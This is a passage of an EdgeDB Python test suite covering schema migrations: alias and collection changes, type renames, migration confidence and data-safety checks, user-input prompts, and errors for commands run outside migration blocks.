await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_14',
foo := 14.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 14.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[14.5],
)
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# "same" alias that now have tuples
alias BaseAlias := Base { bar := (Base.name, Base.foo) };
alias CollAlias := (Base.name, Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': ['coll_14', 14.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_14', 14.5]],
)
async def test_edgeql_migration_eq_collections_15(self):
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias that don't have nested collections
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_15',
number := 15,
foo := 15.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 15.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[15.5],
)
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# "same" alias that now have nested collections
alias BaseAlias := Base {
bar := (Base.name, Base.number, [Base.foo])
};
alias CollAlias := (Base.name, Base.number, [Base.foo]);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': ['coll_15', 15, [15.5]]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_15', 15, [15.5]]],
)
async def test_edgeql_migration_eq_collections_16(self):
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# alias that don't have named tuples
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_16',
foo := 16.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 16.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[16.5],
)
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# "same" alias that now have named tuples
alias BaseAlias := Base {
bar := (a := Base.name, b := Base.foo)
};
alias CollAlias := (a := Base.name, b := Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': {'a': 'coll_16', 'b': 16.5}}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[{'a': 'coll_16', 'b': 16.5}],
)
async def test_edgeql_migration_eq_collections_17(self):
await self.migrate(r"""
type Base {
property foo -> float32;
property bar -> int32;
};
# alias with array<int32>
alias BaseAlias := Base { data := [Base.bar] };
alias CollAlias := [Base.bar];
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 17.5,
bar := 17,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': [17]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[[17]],
)
await self.migrate(r"""
type Base {
property foo -> float32;
property bar -> int32;
};
# alias with array<float32>
alias BaseAlias := Base { data := [Base.foo] };
alias CollAlias := [Base.foo];
""")
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': [17.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[[17.5]],
)
async def test_edgeql_migration_eq_collections_18(self):
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, int32>
alias BaseAlias := Base {
data := (Base.name, Base.number)
};
alias CollAlias := (Base.name, Base.number);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_18',
number := 18,
foo := 18.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['coll_18', 18]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_18', 18]],
)
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, int32, float32>
alias BaseAlias := Base {
data := (Base.name, Base.number, Base.foo)
};
alias CollAlias := (Base.name, Base.number, Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['coll_18', 18, 18.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_18', 18, 18.5]],
)
async def test_edgeql_migration_eq_collections_20(self):
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, int32>
alias BaseAlias := Base {
data := (Base.name, Base.number)
};
alias CollAlias := (Base.name, Base.number);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'test20',
number := 20,
foo := 123.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['test20', 20]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['test20', 20]],
)
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, float32>
alias BaseAlias := Base {
data := (Base.name, Base.foo)
};
alias CollAlias := (Base.name, Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias {data};""",
[{'data': ['test20', 123.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['test20', 123.5]],
)
async def test_edgeql_migration_eq_collections_21(self):
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# alias with tuple<str, float32>
alias BaseAlias := Base {
data := (Base.name, Base.foo)
};
alias CollAlias := (Base.name, Base.foo);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_21',
foo := 21.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['coll_21', 21.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_21', 21.5]],
)
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# alias with named tuple<a: str, b: float32>
alias BaseAlias := Base {
data := (a := Base.name, b := Base.foo)
};
alias CollAlias := (a := Base.name, b := Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': {'a': 'coll_21', 'b': 21.5}}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[{'a': 'coll_21', 'b': 21.5}],
)
async def test_edgeql_migration_eq_drop_module(self):
await self.migrate(r"""
type Base;
""", module='test')
await self.migrate(r"""
scalar type foo extending std::str;
""", module='newtest')
await self.assert_query_result(
'SELECT (SELECT schema::Module FILTER .name LIKE "%test").name;',
['newtest']
)
async def test_edgeql_migration_inherited_optionality_01(self):
await self.migrate(r"""
type User;
type Message {
required link author -> User;
required property body -> str;
};
""")
await self.start_migration(r"""
type User;
type BaseMessage {
required link author -> User;
required property body -> str;
}
type Message extending BaseMessage;
""")
await self.fast_forward_describe_migration()
async def test_edgeql_migration_rename_type_02(self):
await self.migrate(r"""
type Note {
property note -> str;
}
type Subtype extending Note;
type Link {
link a -> Note;
}
type Uses {
required property x -> str {
default := (SELECT Note.note LIMIT 1)
}
};
type ComputeLink {
property foo -> str;
multi link x := (
SELECT Note FILTER Note.note = ComputeLink.foo);
};
alias Alias := Note;
""")
await self.migrate(r"""
type Remark {
property note -> str;
}
type Subtype extending Remark;
type Link {
link a -> Remark;
}
type Uses {
required property x -> str {
default := (SELECT Remark.note LIMIT 1)
}
};
type ComputeLink {
property foo -> str;
multi link x := (
SELECT Remark FILTER Remark.note = ComputeLink.foo);
};
alias Alias := Remark;
""")
await self.migrate("")
async def test_edgeql_migration_rename_type_03(self):
await self.migrate(r"""
type Note {
property note -> str;
}
""")
await self.migrate(r"""
type Remark {
property note -> str;
}
type Subtype extending Remark;
type Link {
link a -> Remark;
}
type Uses {
required property x -> str {
default := (SELECT Remark.note LIMIT 1)
}
};
type ComputeLink {
property foo -> str;
multi link x := (
SELECT Remark FILTER Remark.note = ComputeLink.foo);
};
alias Alias := Remark;
""")
await self.migrate("")
async def test_edgeql_migration_annotation_05(self):
await self.migrate(r"""
abstract inheritable annotation my_anno;
type Base {
property my_prop -> str {
annotation my_anno := 'Base my_anno 05';
}
}
type Derived extending Base {
overloaded property my_prop -> str {
annotation my_anno := 'Derived my_anno 05';
}
}
""")
await self.migrate(r"""
# rename annotated & inherited property
abstract inheritable annotation my_anno;
type Base {
property renamed_prop -> str {
annotation my_anno := 'Base my_anno 05';
}
}
type Derived extending Base {
overloaded property renamed_prop -> str {
annotation my_anno := 'Derived my_anno 05';
}
}
""")
await self.migrate("")
async def test_edgeql_migration_invalid_scalar_01(self):
with self.assertRaisesRegex(
edgedb.SchemaError,
r"may not have more than one concrete base type"):
await self.con.execute(r"""
START MIGRATION TO {
abstract scalar type test::lol extending str;
scalar type test::myint extending int64, test::lol;
};
POPULATE MIGRATION;
""")
async def test_edgeql_migration_scalar_array_01(self):
await self.migrate(r"""
type User {
required property scopes -> array<scope>;
}
scalar type scope extending int64 {
constraint one_of (1, 2);
}
""")
await self.migrate(r"""
type User {
required property scopes -> array<scope>;
}
scalar type scope extending int64 {
constraint one_of (1, 2, 3);
}
""")
async def test_edgeql_migration_scalar_array_02(self):
await self.migrate(r"""
scalar type scope extending int64;
""")
await self.migrate(r"""
type User {
required property scopes -> array<scope>;
}
scalar type scope extending int64 {
constraint one_of (1, 2);
}
""")
async def test_edgeql_migration_force_alter(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property foo -> str;
property bar -> str;
}
type Obj2 {
property o -> int64;
link o1 -> Obj1;
}
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property foo -> str;
property bar -> str;
}
type NewObj2 {
property name -> str;
annotation title := 'Obj2';
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::NewObj2 {\n'
" CREATE ANNOTATION std::title := 'Obj2';\n"
' CREATE PROPERTY name'
' -> std::str;\n'
'};'
}],
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
# We get the parts suggested to us granularly. We only bother
# to check the first one.
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj2 {\n'
' DROP LINK o1;\n'
'\n'
'};'
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_non_ddl_statements(self):
await self.con.execute('SET MODULE test')
await self.start_migration('''
type Obj1 {
property foo -> str;
}
''')
await self.con.execute('SELECT 1')
await self.fast_forward_describe_migration(commit=False)
await self.con.execute('INSERT Obj1 { foo := "test" }')
await self.assert_describe_migration({
'confirmed': [
'SELECT 1;',
'CREATE TYPE test::Obj1 { CREATE PROPERTY foo -> std::str; };',
"INSERT Obj1 { foo := 'test' };"
],
'complete': True,
})
await self.con.execute('COMMIT MIGRATION')
await self.assert_query_result(
'SELECT Obj1 { foo }',
[{'foo': 'test'}],
)
async def test_edgeql_migration_extensions_01(self):
await self.con.execute('''
START MIGRATION TO {
using extension graphql;
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
"CREATE EXTENSION graphql VERSION '1.0';"
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT schema::Extension {
name,
}
FILTER .name = 'graphql'
""",
[{
'name': 'graphql',
}]
)
await self.con.execute('''
START MIGRATION TO {
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'DROP EXTENSION graphql;'
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT schema::Extension {
name,
}
FILTER .name = 'graphql'
""",
[],
)
await self.con.execute('''
START MIGRATION TO {
using extension graphql version '1.0';
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
"CREATE EXTENSION graphql VERSION '1.0';"
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_confidence_01(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property foo -> str;
property bar -> str;
}
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type NewObj1 {
property foo -> str;
property bar -> str;
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj1 RENAME TO test::NewObj1;'
}],
'confidence': 0.637027,
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::NewObj1 {\n'
' CREATE PROPERTY bar -> std::str;'
'\n CREATE PROPERTY foo -> std::str;'
'\n};'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_confidence_02(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1;
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1;
type Obj2;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::Obj2;'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_confidence_03(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1;
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property x -> str;
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj1 {\n '
'CREATE PROPERTY x -> std::str;\n};'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_confidence_04(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
link link -> Object;
}
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
link link -> Object {
property x -> str;
}
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj1 {\n '
'ALTER LINK link {\n '
'CREATE PROPERTY x -> std::str;\n };\n};'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_data_safety_01(self):
await self.start_migration('''
type Obj1;
''')
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj1;
type Obj2;
''')
# Creations are safe
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::Obj2;'
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj1;
''')
# Deletions are NOT safe
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': 'DROP TYPE test::Obj2;'
}],
'data_safe': False,
},
})
await self.fast_forward_describe_migration()
# Renames are safe
await self.start_migration('''
type Obj11;
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Obj1 RENAME TO test::Obj11;'
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Again, creations are safe.
await self.start_migration('''
type Obj11 {
property name -> str {
constraint exclusive;
}
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
CREATE PROPERTY name -> std::str {
CREATE CONSTRAINT std::exclusive;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
# Dropping constraints is safe.
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
DROP CONSTRAINT std::exclusive;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj11 {
property name -> str {
annotation title := 'name';
}
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
CREATE ANNOTATION std::title := 'name';
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Dropping annotations is fine also.
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
DROP ANNOTATION std::title;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
scalar type foo extending str;
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': "CREATE SCALAR TYPE test::foo EXTENDING std::str;",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Dropping scalar types is fine also.
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': "DROP SCALAR TYPE test::foo;",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj11 {
property name -> str;
index on (.name);
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
CREATE INDEX ON (.name);
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Dropping indexes is fine also.
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
DROP INDEX ON (.name);
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Changing single to multi is fine.
await self.start_migration('''
type Obj11 {
multi property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
SET MULTI;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# But changing multi to single is NOT
await self.start_migration('''
type Obj11 {
single property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': r"""
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
SET SINGLE USING (\(conv_expr));
};
};
""",
}],
'data_safe': False,
},
})
await self.fast_forward_describe_migration(
user_input=[
'(SELECT .name LIMIT 1)'
]
)
async def test_edgeql_migration_prompt_id_01(self):
await self.start_migration('''
type Bar { link spam -> Spam };
type Spam { link bar -> Bar };
''')
await self.assert_describe_migration({
'proposed': {
'prompt_id': 'CreateObjectType TYPE test::Bar',
'statements': [{
'text': 'CREATE TYPE test::Bar;'
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration(limit=1)
await self.assert_describe_migration({
'proposed': {
'prompt_id': 'CreateObjectType TYPE test::Spam',
'statements': [{
'text': """
CREATE TYPE test::Spam {
CREATE LINK bar -> test::Bar;
};
""",
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration(limit=1)
# N.B: It is important that the prompt_id here match the
# prompt_id in the first migration, so that the migration tool
# will automatically apply this proposal as part of the
# earlier action.
await self.assert_describe_migration({
'proposed': {
'prompt_id': 'CreateObjectType TYPE test::Bar',
'statements': [{
'text': """
ALTER TYPE test::Bar {
CREATE LINK spam -> test::Spam;
};
""",
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_user_input_01(self):
await self.migrate('''
type Bar { property foo -> str };
''')
await self.start_migration('''
type Bar { property foo -> int64 };
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': '''
ALTER TYPE test::Bar {
ALTER PROPERTY foo {
SET TYPE std::int64 USING (\\(cast_expr));
};
};
'''
}],
'required_user_input': [{
'placeholder': 'cast_expr',
'prompt': (
"Please specify a conversion expression"
" to alter the type of property 'foo'"
),
}],
},
})
async def test_edgeql_migration_user_input_02(self):
await self.migrate('''
type Bar { multi property foo -> str };
''')
await self.start_migration('''
type Bar { single property foo -> str };
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': '''
ALTER TYPE test::Bar {
ALTER PROPERTY foo {
SET SINGLE USING (\\(conv_expr));
};
};
'''
}],
'required_user_input': [{
'placeholder': 'conv_expr',
'prompt': (
"Please specify an expression in order to convert"
" property 'foo' of object type 'test::Bar' to"
" 'single' cardinality"
),
}],
},
})
async def test_edgeql_migration_user_input_03(self):
await self.migrate('''
type Bar {
required property foo -> int64;
};
''')
await self.con.execute('''
SET MODULE test;
INSERT Bar { foo := 42 };
INSERT Bar { foo := 1337 };
''')
await self.start_migration('''
type Bar {
required property foo -> int64;
required property bar -> str;
};
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': '''
ALTER TYPE test::Bar {
CREATE REQUIRED PROPERTY bar -> std::str {
SET REQUIRED USING (\\(fill_expr));
};
};
'''
}],
'required_user_input': [{
'placeholder': 'fill_expr',
'prompt': (
"Please specify an expression to populate existing "
"objects in order to make property 'bar' of object "
"type 'test::Bar' required"
),
}],
},
})
await self.fast_forward_describe_migration(
user_input=[
'<str>.foo ++ "!"'
]
)
await self.assert_query_result(
'''
SELECT Bar {foo, bar} ORDER BY .foo
''',
[
{'foo': 42, 'bar': "42!"},
{'foo': 1337, 'bar': "1337!"},
],
)
async def test_edgeql_migration_user_input_04(self):
await self.migrate('''
type BlogPost {
property title -> str;
}
''')
await self.con.execute('''
SET MODULE test;
INSERT BlogPost { title := "Programming Considered Harmful" }
''')
await self.start_migration('''
abstract type HasContent {
required property content -> str;
}
type BlogPost extending HasContent {
property title -> str;
}
''')
await self.interact([
"did you create object type 'test::HasContent'?",
("did you alter object type 'test::BlogPost'?", "y",
'"This page intentionally left blank"'),
# XXX: There is a final follow-up prompt, since the DDL
# generated above somewhat wrongly leaves 'content' owned
# by the child. This is kind of wrong, but also *works*, so
# maybe it's fine for now.
"did you alter property 'content' of object type "
"'test::BlogPost'?",
])
await self.fast_forward_describe_migration()
await self.assert_query_result(
'''
SELECT BlogPost {title, content}
''',
[
{
'title': "Programming Considered Harmful",
'content': "This page intentionally left blank",
},
],
)
async def test_edgeql_migration_union_01(self):
async with self.assertRaisesRegexTx(
edgedb.QueryError,
"it is illegal to create a type union that causes a "
"computed property 'deleted' to mix with other versions of the "
"same property 'deleted'"
):
await self.migrate('''
type Category {
required property title -> str;
required property deleted :=
EXISTS(.<element[IS DeletionRecord]);
};
type Article {
required property title -> str;
required property deleted :=
EXISTS(.<element[IS DeletionRecord]);
};
type DeletionRecord {
link element -> Article | Category;
}
''')
async def test_edgeql_migration_backlink_01(self):
await self.migrate('''
type User {
link posts := .<user;
}
abstract type Action {
required link user -> User;
}
type Post extending Action;
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT User;
''')
post = await self.con.query_single('''
INSERT Post {
user := (SELECT User LIMIT 1),
};
''')
await self.assert_query_result(
r'''
SELECT User{
id,
posts: {
id
} LIMIT 1 # this LIMIT is needed as a workaround
# for another bug
}
''',
[
{
'posts': [{'id': str(post.id)}],
},
],
)
async def test_edgeql_migration_misplaced_commands(self):
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute ALTER CURRENT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute DESCRIBE CURRENT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
DESCRIBE CURRENT MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute COMMIT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
COMMIT MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute ABORT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
ABORT MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute POPULATE MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
POPULATE MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CREATE DATABASE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CREATE DATABASE should_not_happen;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CREATE ROLE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CREATE ROLE should_not_happen;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CREATE MIGRATION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CREATE MIGRATION blah;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute START MIGRATION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
START MIGRATION TO { module test { type Foo; }};
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute START TRANSACTION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.query('''
START TRANSACTION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute START TRANSACTION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.query('''
START TRANSACTION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CONFIGURE INSTANCE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CONFIGURE INSTANCE SET _foo := 123;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CONFIGURE DATABASE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CONFIGURE CURRENT DATABASE SET _foo := 123;
''')
@test.xfail('''
edgedb.errors.InvalidReferenceError: scalar type 'test::Alias'
does not exist
''')
async def test_edgeql_migration_alias_01(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias;
};
alias Alias := {0, 1, 2, 3};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {0, 1, 2, 3},
},
],
)
@test.xfail('''
Referring to alias unsupported from computable
This is the only test that broke when we disallowed that!
''')
async def test_edgeql_migration_alias_02(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias + 0;
};
alias Alias := {0, 1, 2, 3};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {0, 1, 2, 3},
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias + 0;
};
alias Alias := {4, 5};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {4, 5},
},
],
)
@test.xfail('''
The second migration check produces the following issue:
No more "proposed", but not "completed" either.
''')
async def test_edgeql_migration_alias_03(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := {Alias, Alias};
};
alias Alias := 42;
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': [42, 42],
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
property comp := {Alias, Alias};
};
alias Alias := 'alias';
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': ['alias', 'alias'],
},
],
)
@test.xfail('''
The migration works, but then the query produces this error
(implying that the migration didn't update the type of the computable).
edgedb.errors.InvalidValueError: invalid input syntax for type
std::int64: "alias"
''')
async def test_edgeql_migration_alias_04(self):
# Same as the previous test, but using a single DDL command to
# migrate.
await self.migrate(r'''
type Foo {
property name -> str;
property comp := {Alias, Alias};
};
alias Alias := 42;
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': [42, 42],
},
],
)
# Instead of using an SDL migration, use a single DDL command.
await self.con.execute('''
ALTER ALIAS Alias USING ('alias');
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': ['alias', 'alias'],
},
],
)
@test.xfail('''
edgedb.errors.InvalidReferenceError: object type 'test::Alias'
does not exist
''')
async def test_edgeql_migration_alias_05(self):
await self.migrate(r'''
type Foo {
property name -> str;
link comp := Alias;
};
type Bar;
alias Alias := Bar {val := 42};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Bar;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp: {
val
},
}
''',
[
{
'name': 'foo',
'comp': {
'val': 42,
},
},
],
)
@test.xfail('''
The second migration check produces the following issue:
No more "proposed", but not "completed" either.
''')
async def test_edgeql_migration_alias_06(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias.val;
};
type Bar;
alias Alias := Bar {val := 42};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Bar;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
